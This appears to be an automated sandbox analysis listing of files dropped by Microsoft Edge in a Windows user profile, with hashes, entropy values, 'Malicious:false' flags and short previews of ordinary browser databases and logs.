                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):25012
                                                                                                                                                                                                                                                Entropy (8bit):5.566953684472815
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:NX2FQaWP8efkr8F1+UoAYDCx9Tuqh0VfUC9xbog/OVHaWQzrwepwtur:NX2FQaWP8efkru1jayHQIZt4
                                                                                                                                                                                                                                                MD5:EB36A55DF7873B903A0EDF748451A0D7
                                                                                                                                                                                                                                                SHA1:8A432A926C5EC1A25EAE9FB0B56461ADF81CB720
                                                                                                                                                                                                                                                SHA-256:1C19BE7282B537361E9CA63051D591F5B548D9F8ED9BD67829F9037976C4BCAD
                                                                                                                                                                                                                                                SHA-512:5F473F89DC3B842CCFAE04FDB3A08C79DDD0795823F059F4C915A770DE8B0C86B13D369EEA06BE27891E0D5A62970FB98475605EE1FFC8704D7A315FF4F78D1D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378838846714906","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378838846714906","location":5,"ma

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9e5d0a47-a022-4448-89c6-f664411e7f17.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):33
                                                                                                                                                                                                                                                Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):315
                                                                                                                                                                                                                                                Entropy (8bit):5.253896023143035
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/fp/1cNwi23oH+Tcwtp3hBtB2KLlp/fgQOq2PcNwi23oH+Tcwtp3hBWsIFUv:7/vZYebp3dFLT/IQOvLZYebp3eFUv
                                                                                                                                                                                                                                                MD5:85B86C74EACB3204C9C5B483489D29F7
                                                                                                                                                                                                                                                SHA1:9C3AC5C5086DB79631F1D3C8BC9EA7906B2300E3
                                                                                                                                                                                                                                                SHA-256:7714B9D2ABC2587ED9E81C684052E9E0703CF8AB71666150163D471DB86099F9
                                                                                                                                                                                                                                                SHA-512:B7E234C1784F6F2DD57A2C78FEA7D80D5B6BC269F17A87CDC560BA8B3155CDF890B52EC762A322B1F8655C0BD334DF80CDF8D30ADAE223C0A18E4A9DCBCEF8B0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:31.827 1480 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/16-11:07:31.870 1480 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):1696115
                                                                                                                                                                                                                                                Entropy (8bit):5.0406349903893695
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:kcf76gGkISshcFdmcOAoPENUpifYP+MbI2T:kcfgAmmE
                                                                                                                                                                                                                                                MD5:662F3136CB880AADC9116B1755B6086C
                                                                                                                                                                                                                                                SHA1:A0E6244A7C7AB0F897BA38EFF0ACAE75F7C0500D
                                                                                                                                                                                                                                                SHA-256:056A5EA34AD1175BE82DD138F83AC94D33D0F0657C0E4D2E00B8AD5058E26654
                                                                                                                                                                                                                                                SHA-512:00989B992C482830716A1FF9AA5AC68DCEE5915DAEFF9151B1947DEBDC9AC5371227FBD26DCA100E1F8022EB8706D1E264734B00BC11A251B044A137BD2A9338
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340965219355520.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):342
                                                                                                                                                                                                                                                Entropy (8bit):5.156415265661936
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/fPM+q2PcNwi23oH+Tcwt9Eh1tIFUt8O/fmZmw+O/f8MVkwOcNwi23oH+Tcwt9O:7/3M+vLZYeb9Eh16FUt8O/e/+O/kMV5t
                                                                                                                                                                                                                                                MD5:2DA52B960B18DE3B43CF5754841AE199
                                                                                                                                                                                                                                                SHA1:EFA963D75532CCACE07D911A884B054BEE8EC8E9
                                                                                                                                                                                                                                                SHA-256:4C66823E980DA295B0D8A437EB6DF953866FEFA863714FC4D3D6A44E4DF8F4A0
                                                                                                                                                                                                                                                SHA-512:1A56502F91FEC3177D2E6D99D36E54B83BDC6525B92C984892B887CB6CBED4031AC92EBB8DCF6C71B3841A8CEDAD2323E39117BAAC94A64DCD25BC3A76788BA7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:31.746 1f6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/16-11:07:31.748 1f6c Recovering log #3.2024/12/16-11:07:31.756 1f6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):342
                                                                                                                                                                                                                                                Entropy (8bit):5.156415265661936
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/fPM+q2PcNwi23oH+Tcwt9Eh1tIFUt8O/fmZmw+O/f8MVkwOcNwi23oH+Tcwt9O:7/3M+vLZYeb9Eh16FUt8O/e/+O/kMV5t
                                                                                                                                                                                                                                                MD5:2DA52B960B18DE3B43CF5754841AE199
                                                                                                                                                                                                                                                SHA1:EFA963D75532CCACE07D911A884B054BEE8EC8E9
                                                                                                                                                                                                                                                SHA-256:4C66823E980DA295B0D8A437EB6DF953866FEFA863714FC4D3D6A44E4DF8F4A0
                                                                                                                                                                                                                                                SHA-512:1A56502F91FEC3177D2E6D99D36E54B83BDC6525B92C984892B887CB6CBED4031AC92EBB8DCF6C71B3841A8CEDAD2323E39117BAAC94A64DCD25BC3A76788BA7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:31.746 1f6c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/16-11:07:31.748 1f6c Recovering log #3.2024/12/16-11:07:31.756 1f6c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):28672
                                                                                                                                                                                                                                                Entropy (8bit):0.46303124773190013
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu5D:TouQq3qh7z3bY2LNW9WMcUvBul
                                                                                                                                                                                                                                                MD5:37D43ED9153B16E85CB2F96AF960934A
                                                                                                                                                                                                                                                SHA1:D7F381DC42676997C5C6BE213CEF69DD82A10A08
                                                                                                                                                                                                                                                SHA-256:78AD748000D0EB585B36BF9ED6DC7C4CB952A8DD91A0C7E6987452A7430DD090
                                                                                                                                                                                                                                                SHA-512:D6849109B9A9A99737D9350CE3692366908BDDF843777CD2BFCFE03482913C949D22AC2C8F4F5B22B597E4B267EE49416D2DB65AC47BE96AFEE125775580BB7A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10240
                                                                                                                                                                                                                                                Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):354
                                                                                                                                                                                                                                                Entropy (8bit):5.23465115808521
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/vAOq2PcNwi23oH+TcwtnG2tMsIFUt8O/OUNZmw+O/OU/kwOcNwi23oH+TcwtnB:7/YOvLZYebn9GFUt8O/7N/+O/7/54ZYi
                                                                                                                                                                                                                                                MD5:F89861801346374ACE7A032745F92056
                                                                                                                                                                                                                                                SHA1:90D0AF67E5049CC94566D1ADE7B1AEE3AE3B3556
                                                                                                                                                                                                                                                SHA-256:853DA697F53C443275360A43A884CD27FC196E4C0DE762927F18A65F3656A216
                                                                                                                                                                                                                                                SHA-512:C5C4FF4BA30A4A0490803220F3E3D36DBC56D51C81D7A5468B11AA66F121FC5FC0CBA6C7D676213EE50C58D5D5E1E2AFFA7EFF1A2A58D7C13DC32174B16E7767
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:26.938 1804 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/16-11:07:26.942 1804 Recovering log #3.2024/12/16-11:07:26.942 1804 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):354
                                                                                                                                                                                                                                                Entropy (8bit):5.23465115808521
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/vAOq2PcNwi23oH+TcwtnG2tMsIFUt8O/OUNZmw+O/OU/kwOcNwi23oH+TcwtnB:7/YOvLZYebn9GFUt8O/7N/+O/7/54ZYi
                                                                                                                                                                                                                                                MD5:F89861801346374ACE7A032745F92056
                                                                                                                                                                                                                                                SHA1:90D0AF67E5049CC94566D1ADE7B1AEE3AE3B3556
                                                                                                                                                                                                                                                SHA-256:853DA697F53C443275360A43A884CD27FC196E4C0DE762927F18A65F3656A216
                                                                                                                                                                                                                                                SHA-512:C5C4FF4BA30A4A0490803220F3E3D36DBC56D51C81D7A5468B11AA66F121FC5FC0CBA6C7D676213EE50C58D5D5E1E2AFFA7EFF1A2A58D7C13DC32174B16E7767
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:2024/12/16-11:07:26.938 1804 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/16-11:07:26.942 1804 Recovering log #3.2024/12/16-11:07:26.942 1804 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                Entropy (8bit):0.6135997973625256
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jKbpj4cmL:TO8D4jJ/6Up+P
                                                                                                                                                                                                                                                MD5:25AE0C0F851A35122B542D4FB58D7A80
                                                                                                                                                                                                                                                SHA1:E24FE9836373C80D53B500040105240B3349C40B
                                                                                                                                                                                                                                                SHA-256:BF927773C0B4EF2B6B995A018765CE7CF4A94DC0B92A8E87F8574C8441758A66
                                                                                                                                                                                                                                                SHA-512:EDBAD1DD93ABFA8C4A45E4A008FB3A6F71D85DBE78DD6BB2403A87BA4546860D66AEB9E9508C641472EE68D0DAB322A66970C8F07E64188F8AC7936C8EED23E3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):375520
                                                                                                                                                                                                                                                Entropy (8bit):5.354100589700915
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:lA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:lFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                MD5:0598B1E1EA48280071406BAB64C45273
                                                                                                                                                                                                                                                SHA1:17C96810BEA081BEF0EE8717029589E29527517D
                                                                                                                                                                                                                                                SHA-256:C5231356E9EAD906BC861B6E70EE64713F07508AEF503CC4601AE358FCE92953
                                                                                                                                                                                                                                                SHA-512:39C78C3A7BBCF3065D8BC6EA41CB65241E538710E48C776C83CA708B31DE121C9E7EFACD82F1B2ACC6D1BE3AE32A99CAF0F9014C3C24FC4BEB0E01FD619A7F43
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:...m.................DB_VERSION.1.t.zq...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13378838854887347..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):317
                                                                                                                                                                                                                                                Entropy (8bit):5.157238550705001
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:7/fAF0M1cNwi23oH+Tcwtk2WwnvB2KLlp/fu4q2PcNwi23oH+Tcwtk2WwnvIFUv:7/402ZYebkxwnvFLT/24vLZYebkxwnQg
